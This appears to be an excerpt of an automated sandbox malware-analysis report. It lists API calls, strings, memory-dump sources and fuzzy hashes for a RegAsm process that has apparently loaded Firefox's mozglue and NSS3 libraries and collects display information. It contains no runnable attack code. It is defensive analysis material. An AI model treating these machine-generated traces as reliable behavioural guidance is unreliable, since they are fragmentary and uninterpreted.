                                                                                    • Instruction ID: 22c0f6446ab873f43d50a64293b96aeef2e6e76e590fc671d4a1a890a38f3f90
                                                                                    • Opcode Fuzzy Hash: 44fda56f94a84bc78a2f28d8a827dcd1ec677aaf2bede1531f218c491d51a28f
                                                                                    • Instruction Fuzzy Hash: D44180796016549FCB10CFA5C880A9BBBF1FF49318F40451DE95A93B50EB31E815CFA5
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC47EA7
                                                                                    • malloc.MOZGLUE(00000001), ref: 6CC47EB3
                                                                                      • Part of subcall function 6CC4CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC4CB49
                                                                                      • Part of subcall function 6CC4CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC4CBB6
                                                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CC47EC4
                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6CC47F19
                                                                                    • malloc.MOZGLUE(?), ref: 6CC47F36
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC47F4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                    • String ID: d
                                                                                    • API String ID: 204725295-2564639436
                                                                                    • Opcode ID: 2f887633605dacda3c39dff14492903448098281593e64e40e4ad912cf8322ef
                                                                                    • Instruction ID: b889903a3ecdc4c8aa6a2d9b55165ef10a0482e4a8d708589b91b3302115cd16
                                                                                    • Opcode Fuzzy Hash: 2f887633605dacda3c39dff14492903448098281593e64e40e4ad912cf8322ef
                                                                                    • Instruction Fuzzy Hash: 55310861E0474897EB009BA8DC449FEB778EF96308F049369ED4957612FB31A9C8C390
                                                                                    APIs
                                                                                    • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CD8ACE6
                                                                                    • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD8AD14
                                                                                    • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD8AD23
                                                                                      • Part of subcall function 6CE6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE6D963
                                                                                    • PR_LogPrint.NSS3(?,00000000), ref: 6CD8AD39
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: L_strncpyzPrint$L_strcatn
                                                                                    • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nl
                                                                                    • API String ID: 332880674-1116290892
                                                                                    • Opcode ID: c1103f5f2736ca9640751a55e7e614f653a9c1156034aa9b5fdd4772a5aecba3
                                                                                    • Instruction ID: 7621dd45a8b533af3c8bfc8902c111db10d6a09f94b2e9100a57cb93cd9ddcf0
                                                                                    • Opcode Fuzzy Hash: c1103f5f2736ca9640751a55e7e614f653a9c1156034aa9b5fdd4772a5aecba3
                                                                                    • Instruction Fuzzy Hash: 63212971B02114DFDB019B64DE88B7A33B5AF4230DF544429E90DDBBA1EB30A808C7A6
                                                                                    APIs
                                                                                    • CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?), ref: 004103E2
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?,00000000), ref: 004103E9
                                                                                    • wsprintfA.USER32 ref: 004103FB
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                    • String ID: %dx%d
                                                                                    • API String ID: 3940144428-2206825331
                                                                                    • Opcode ID: 30f86b60f930c873313ec7c5774ef3a48a17be0fe37c96a3dd60c61a3b553a6d
                                                                                    • Instruction ID: abe2dc7565195900069bf305cbe27ff29e290cf18ddbcc6ac3f8b37d05cd60ac
                                                                                    • Opcode Fuzzy Hash: 30f86b60f930c873313ec7c5774ef3a48a17be0fe37c96a3dd60c61a3b553a6d
                                                                                    • Instruction Fuzzy Hash: 70F0AD35A01224FBE7106BA1AC0DE9F7E6DFF4ABA5F001015FA0193150D6B449018BB4
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6CC43EEE
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC43FDC
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6CC44006
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC440A1
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC440AF
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC440C2
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC44134
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC44143
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC44157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$Heap$StringUnicode$Allocate
                                                                                    • String ID:
                                                                                    • API String ID: 3680524765-0
                                                                                    • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                    • Instruction ID: 14fd4fb397468fd9184bf2fffdb0c221c118ec1c83516fd763b5dbf68b263557
                                                                                    • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                    • Instruction Fuzzy Hash: 57A172B1A00215CFEB40CF69C880659B7F5FF88314F29C599D909AF752E772D856CBA0
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(00000000,?,6CC53F47,?,?,?,6CC53F47,6CC51A70,?), ref: 6CC3207F
                                                                                    • memset.VCRUNTIME140(?,000000E5,6CC53F47,?,6CC53F47,6CC51A70,?), ref: 6CC320DD
                                                                                    • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6CC53F47,6CC51A70,?), ref: 6CC3211A
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC32145
                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6CC53F47,6CC51A70,?), ref: 6CC321BA
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC321E0
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC32232
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                    • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                    • API String ID: 889484744-884734703
                                                                                    • Opcode ID: c76313d9b5fe5cbf03be54c1b3f779727829591991bc0595671f8275b7cc2475
                                                                                    • Instruction ID: 204fc627109df70c3c88df9551e345408041ca825da1858674256c2b6f525715
                                                                                    • Opcode Fuzzy Hash: c76313d9b5fe5cbf03be54c1b3f779727829591991bc0595671f8275b7cc2475
                                                                                    • Instruction Fuzzy Hash: 9861D331F002268FCF04CAA9DDA9B6E76B1AF85314F294239E528A7A95F7719C00C7C5
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6CC7483A,?), ref: 6CC34ACB
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6CC7483A,?), ref: 6CC34AE0
                                                                                    • moz_xmalloc.MOZGLUE(FFFE15BF,?,6CC7483A,?), ref: 6CC34A82
                                                                                      • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6CC7483A,?), ref: 6CC34A97
                                                                                    • moz_xmalloc.MOZGLUE(15D4E801,?,6CC7483A,?), ref: 6CC34A35
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6CC7483A,?), ref: 6CC34A4A
                                                                                    • moz_xmalloc.MOZGLUE(15D4E824,?,6CC7483A,?), ref: 6CC34AF4
                                                                                    • moz_xmalloc.MOZGLUE(FFFE15E2,?,6CC7483A,?), ref: 6CC34B10
                                                                                    • moz_xmalloc.MOZGLUE(8E8E0022,?,6CC7483A,?), ref: 6CC34B2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                    • String ID:
                                                                                    • API String ID: 4251373892-0
                                                                                    • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                    • Instruction ID: 6891b6da4bcde1f6712743714a6eeca5b4cc3b6490a889f9630283d82afbf301
                                                                                    • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                    • Instruction Fuzzy Hash: E0715BB19007069FC754CF69D580AAABBF5FF09308B10863ED15A9BB51F732E995CB80
                                                                                    APIs
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC88273), ref: 6CC89D65
                                                                                    • free.MOZGLUE(6CC88273,?), ref: 6CC89D7C
                                                                                    • free.MOZGLUE(?,?), ref: 6CC89D92
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC89E0F
                                                                                    • free.MOZGLUE(6CC8946B,?,?), ref: 6CC89E24
                                                                                    • free.MOZGLUE(?,?,?), ref: 6CC89E3A
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC89EC8
                                                                                    • free.MOZGLUE(6CC8946B,?,?,?), ref: 6CC89EDF
                                                                                    • free.MOZGLUE(?,?,?,?), ref: 6CC89EF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                    • String ID:
                                                                                    • API String ID: 956590011-0
                                                                                    • Opcode ID: a73661cf76e04e04c3314912db0c496f9f0db4acfd5adc7d1b40183cf7e6ee5a
                                                                                    • Instruction ID: 4a635acd91bfd117a0395710259883c8385e3520b466af2a8eec46a4ff0ec448
                                                                                    • Opcode Fuzzy Hash: a73661cf76e04e04c3314912db0c496f9f0db4acfd5adc7d1b40183cf7e6ee5a
                                                                                    • Instruction Fuzzy Hash: B9719EB090AB418BC712CF18C48055BFBF4FF99319B448659E89A5BB02FB30F895CB95
                                                                                    APIs
                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CC8DDCF
                                                                                      • Part of subcall function 6CC6FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC6FA4B
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                                      • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DE0D
                                                                                    • free.MOZGLUE(00000000), ref: 6CC8DE41
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DE5F
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DEA3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DEE9
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC7DEFD,?,6CC44A68), ref: 6CC8DF32
                                                                                      • Part of subcall function 6CC8DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DB86
                                                                                      • Part of subcall function 6CC8DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DC0E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC7DEFD,?,6CC44A68), ref: 6CC8DF65
                                                                                    • free.MOZGLUE(?), ref: 6CC8DF80
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                    • String ID:
                                                                                    • API String ID: 112305417-0
                                                                                    • Opcode ID: 89edb802102ee76bc44afe8b9f298d2ed4ce44ddf5527cce7c8043b150dd35b1
                                                                                    • Instruction ID: b89c7cf48a436d5ee1bb91cefaf3e392a48f23cd081337e61372806747c15651
                                                                                    • Opcode Fuzzy Hash: 89edb802102ee76bc44afe8b9f298d2ed4ce44ddf5527cce7c8043b150dd35b1
                                                                                    • Instruction Fuzzy Hash: 9651C7727026029BD7119F18D8806AFB772BF9131CF95011ED45A53B00F731F85ACBA2
                                                                                    APIs
                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D32
                                                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D62
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D6D
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D84
                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95DA4
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95DC9
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6CC95DDB
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95E00
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95E45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 2325513730-0
                                                                                    • Opcode ID: 5cfedafd0c29329e258b3d6cc9f8e16e7e071290dbc790c8e474f7bf375af258
                                                                                    • Instruction ID: fb7876f300e37f58bd7c90a59601ddad3c929e030b0e8c0298208de06f187c6d
                                                                                    • Opcode Fuzzy Hash: 5cfedafd0c29329e258b3d6cc9f8e16e7e071290dbc790c8e474f7bf375af258
                                                                                    • Instruction Fuzzy Hash: 5941C2757002058FCB00DFA5C9D8AAE77B5FF89319F0441A8E50697791EB35EC06CB60
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC331A7), ref: 6CC6CDDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 4275171209-2186867486
                                                                                    • Opcode ID: 3b1509cdb8a27fc19319f1ec38b160d3553e756fc0d96ecbb2baaf9136e9b9d6
                                                                                    • Instruction ID: 7986fe24accd01d142f8e5c75f5376e31a01c2699bf7f5f4bf737bb9bf9e6cb9
                                                                                    • Opcode Fuzzy Hash: 3b1509cdb8a27fc19319f1ec38b160d3553e756fc0d96ecbb2baaf9136e9b9d6
                                                                                    • Instruction Fuzzy Hash: 4431A331B442055BEF10AFEA8DD5B6E7B75BF41B58F204019F610ABE80FB70E4018BA5
                                                                                    APIs
                                                                                      • Part of subcall function 6CC3F100: LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                                      • Part of subcall function 6CC3F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6CC3ED50
                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC3EDAC
                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC3EDCC
                                                                                    • CreateFileW.KERNEL32 ref: 6CC3EE08
                                                                                    • free.MOZGLUE(00000000), ref: 6CC3EE27
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC3EE32
                                                                                      • Part of subcall function 6CC3EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC3EBB5
                                                                                      • Part of subcall function 6CC3EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CC6D7F3), ref: 6CC3EBC3
                                                                                      • Part of subcall function 6CC3EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CC6D7F3), ref: 6CC3EBD6
                                                                                    Strings
                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC3EDC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                    • API String ID: 1980384892-344433685
                                                                                    • Opcode ID: 16ad29734e63e0849865ad23842afd8107fa41eaa2676d7c1b81d95605e19852
                                                                                    • Instruction ID: 354f9080f5a777a7a32b0881fcf449c7172278be4387c5a7896af4fb334c207f
                                                                                    • Opcode Fuzzy Hash: 16ad29734e63e0849865ad23842afd8107fa41eaa2676d7c1b81d95605e19852
                                                                                    • Instruction Fuzzy Hash: 7C51E171D052248BDB01DF69E8447EEB7B0AF49318F44946DE8596B780FB306D48CBE2
                                                                                    APIs
                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCAA565
                                                                                      • Part of subcall function 6CCAA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCAA4BE
                                                                                      • Part of subcall function 6CCAA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CCAA4D6
                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCAA65B
                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CCAA6B6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
